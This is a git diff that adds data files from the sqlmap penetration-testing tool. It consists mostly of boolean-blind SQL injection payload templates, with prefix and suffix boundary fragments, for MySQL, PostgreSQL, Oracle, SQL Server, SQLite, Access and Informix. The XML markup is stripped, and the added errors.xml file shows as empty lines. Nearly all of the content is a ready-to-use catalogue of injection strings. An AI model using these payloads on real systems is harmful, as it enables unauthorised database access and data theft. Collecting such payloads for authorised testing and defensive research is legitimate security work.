'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )+' + + + + 5 + 9 + 1 + 2 + ||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] + )|| + + + + 5 + 9 + 1 + 2 + ||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )|| + + + + 5 + 9 + 1 + 1 + +(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + )+ + + + + 5 + 9 + 1 + 2 + +(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )+ + + + + + + 5 + 1 + 1,2 + 2 + ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1,2 + 2 + ")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1,2 + 1 + )) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 1 + 1,2 + 2 + ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1,2 + 4 + ") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 1 + 1,2 + 1 + ) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 1 + 1 + 1 + ` WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1 + 1 + `) WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + + + 4 + 8 + 1 + 6 + `=`[ORIGINAL]` + AND `[ORIGINAL]`=`[ORIGINAL] + + + + 5 + 8 + 1 + 6 + "="[ORIGINAL]" + AND "[ORIGINAL]"="[ORIGINAL] + + + + 5 + 8 + 1 + 6 + ]-(SELECT 0 WHERE [RANDNUM]=[RANDNUM] + )|[[ORIGINAL] + + + + + 5 + 7 + 1 + 3 + [RANDSTR1], + [RANDSTR2] + + + + + 4 + 1 + 1 + 2 + ' IN BOOLEAN MODE) + # + + + diff --git a/src/sqlmap-master/data/xml/errors.xml b/src/sqlmap-master/data/xml/errors.xml new file mode 100644 index 0000000..4993a8a --- /dev/null +++ b/src/sqlmap-master/data/xml/errors.xml @@ -0,0 +1,240 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/src/sqlmap-master/data/xml/payloads/boolean_blind.xml b/src/sqlmap-master/data/xml/payloads/boolean_blind.xml new file mode 100644 index 0000000..ae8b6de --- /dev/null +++ b/src/sqlmap-master/data/xml/payloads/boolean_blind.xml @@ -0,0 +1,1612 @@ + + + + + + + + AND boolean-based blind - WHERE or HAVING clause + 1 + 1 + 1 + 1,8,9 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + + + AND [RANDNUM]=[RANDNUM1] + + + + + OR boolean-based blind - WHERE or HAVING clause + 1 + 1 + 3 + 1,9 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + + + OR [RANDNUM]=[RANDNUM1] + + + + + OR boolean-based blind - WHERE or HAVING clause (NOT) + 1 + 3 + 3 + 1,9 + 1 + OR NOT [INFERENCE] + + OR NOT [RANDNUM]=[RANDNUM] + + + OR NOT [RANDNUM]=[RANDNUM1] + + + + + AND boolean-based blind - WHERE or HAVING clause (subquery - comment) + 1 + 2 + 1 + 1,8,9 + 1 + AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + [GENERIC_SQL_COMMENT] + + + AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + + + OR boolean-based blind - WHERE or HAVING clause (subquery - comment) + 1 + 2 + 3 + 1,9 + 2 + OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + [GENERIC_SQL_COMMENT] + + + OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + + + AND boolean-based blind - WHERE or HAVING clause (comment) + 1 + 2 + 1 + 1 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + AND [RANDNUM]=[RANDNUM1] + + + + + OR boolean-based blind - WHERE or HAVING clause (comment) + 1 + 2 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + OR [RANDNUM]=[RANDNUM1] + + + + + OR boolean-based blind - WHERE or HAVING clause (NOT - comment) + 1 + 4 + 3 + 1 + 1 + OR NOT [INFERENCE] + + OR NOT [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + OR NOT [RANDNUM]=[RANDNUM1] + + + + + AND boolean-based blind - WHERE or HAVING clause (MySQL comment) + 1 + 3 + 1 + 1 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + # + + + AND [RANDNUM]=[RANDNUM1] + +
+ MySQL +
+
+ + + OR boolean-based blind - WHERE or HAVING clause (MySQL comment) + 1 + 3 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + # + + + OR [RANDNUM]=[RANDNUM1] + +
+ MySQL +
+
+ + + OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) + 1 + 3 + 3 + 1 + 1 + OR NOT [INFERENCE] + + OR NOT [RANDNUM]=[RANDNUM] + # + + + OR NOT [RANDNUM]=[RANDNUM1] + +
+ MySQL +
+
+ + + AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) + 1 + 3 + 1 + 1 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + %16 + + + AND [RANDNUM]=[RANDNUM1] + +
+ Microsoft Access +
+
+ + + OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) + 1 + 3 + 3 + 1 + 2 + OR [INFERENCE] + + OR [RANDNUM]=[RANDNUM] + %16 + + + OR [RANDNUM]=[RANDNUM1] + +
+ Microsoft Access +
+
+ + + MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + 1 + 2 + 1 + 1,2,3 + 1 + RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) + + RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END)) + + + RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END)) + +
+ MySQL +
+
+ + + MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) + 1 + 3 + 1 + 1,2,3,8 + 1 + AND MAKE_SET([INFERENCE],[RANDNUM]) + + AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) + 1 + 3 + 3 + 1,2,3 + 2 + OR MAKE_SET([INFERENCE],[RANDNUM]) + + OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) + 1 + 4 + 1 + 1,2,3,8 + 1 + AND ELT([INFERENCE],[RANDNUM]) + + AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) + 1 + 4 + 3 + 1,2,3 + 2 + OR ELT([INFERENCE],[RANDNUM]) + + OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) + 1 + 5 + 1 + 1,2,3,8 + 1 + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) + + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) + + + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END) + +
+ MySQL +
+
+ + + MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) + 1 + 5 + 3 + 1,2,3,8 + 2 + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) + + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) + + + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END) + +
+ MySQL +
+
+ + + PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST) + 1 + 2 + 1 + 1,8 + 1 + AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + + AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + + + AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + +
+ PostgreSQL +
+
+ + + PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST) + 1 + 3 + 3 + 1 + 2 + OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + + OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + + + OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL + +
+ PostgreSQL +
+
+ + + Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) + 1 + 2 + 1 + 1 + 1 + AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + + AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + + + AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + +
+ Oracle +
+
+ + + Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) + 1 + 3 + 3 + 1 + 2 + OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + + OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + + + OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL + +
+ Oracle +
+
+ + + SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON) + 1 + 2 + 1 + 1 + 1 + AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + + AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + +
+ SQLite +
+
+ + + SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON) + 1 + 3 + 3 + 1 + 2 + OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + + OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + +
+ SQLite +
+
+ + + + + + Boolean-based blind - Parameter replace (original value) + 1 + 1 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + + + MySQL boolean-based blind - Parameter replace (MAKE_SET) + 1 + 4 + 1 + 1,2,3 + 3 + MAKE_SET([INFERENCE],[RANDNUM]) + + MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (MAKE_SET - original value) + 1 + 5 + 1 + 1,2,3 + 3 + MAKE_SET([INFERENCE],[ORIGVALUE]) + + MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE]) + + + MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE]) + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (ELT) + 1 + 4 + 1 + 1,2,3 + 3 + ELT([INFERENCE],[RANDNUM]) + + ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (ELT - original value) + 1 + 5 + 1 + 1,2,3 + 3 + ELT([INFERENCE],[ORIGVALUE]) + + ELT([RANDNUM]=[RANDNUM],[ORIGVALUE]) + + + ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE]) + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (bool*int) + 1 + 4 + 1 + 1,2,3 + 3 + ([INFERENCE])*[RANDNUM] + + ([RANDNUM]=[RANDNUM])*[RANDNUM1] + + + ([RANDNUM]=[RANDNUM1])*[RANDNUM1] + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (bool*int - original value) + 1 + 5 + 1 + 1,2,3 + 3 + ([INFERENCE])*[ORIGVALUE] + + ([RANDNUM]=[RANDNUM])*[ORIGVALUE] + + + ([RANDNUM]=[RANDNUM1])*[ORIGVALUE] + +
+ MySQL +
+
+ + + PostgreSQL boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + PostgreSQL boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + + PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES) + 1 + 5 + 1 + 1,2,3 + 3 + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + +
+ PostgreSQL +
+
+ + + + PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) + 1 + 5 + 1 + 1,2,3 + 3 + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + +
+ Oracle +
+
+ + + Oracle boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + +
+ Oracle +
+
+ + + Informix boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) + +
+ Informix +
+
+ + + Informix boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) + +
+ Informix +
+
+ + + Microsoft Access boolean-based blind - Parameter replace + 1 + 3 + 1 + 1,3 + 3 + IIF([INFERENCE],[RANDNUM],1/0) + + IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0) + + + IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0) + +
+ Microsoft Access +
+
+ + + Microsoft Access boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,3 + 3 + IIF([INFERENCE],[ORIGVALUE],1/0) + + IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) + + + IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0) + +
+ Microsoft Access +
+
+ + + + Boolean-based blind - Parameter replace (DUAL) + 1 + 2 + 1 + 1,2,3 + 3 + (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + + (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + + + + Boolean-based blind - Parameter replace (DUAL - original value) + 1 + 3 + 1 + 1,2,3 + 3 + (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + + (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) + + + + + + + Boolean-based blind - Parameter replace (CASE) + 1 + 2 + 1 + 1,3 + 3 + (CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END) + + (CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END) + + + (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END) + + + + + Boolean-based blind - Parameter replace (CASE - original value) + 1 + 3 + 1 + 1,3 + 3 + (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) + + (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) + + + (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) + + + + + + + MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause + 1 + 2 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + +
+ MySQL + >= 5.0 +
+
+ + + MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause + 1 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + +
+ MySQL + < 5.0 +
+
+ + + MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 4 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + +
+ MySQL + < 5.0 +
+
+ + + PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause + 1 + 2 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + + PostgreSQL boolean-based blind - ORDER BY clause (original value) + 1 + 4 + 1 + 3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
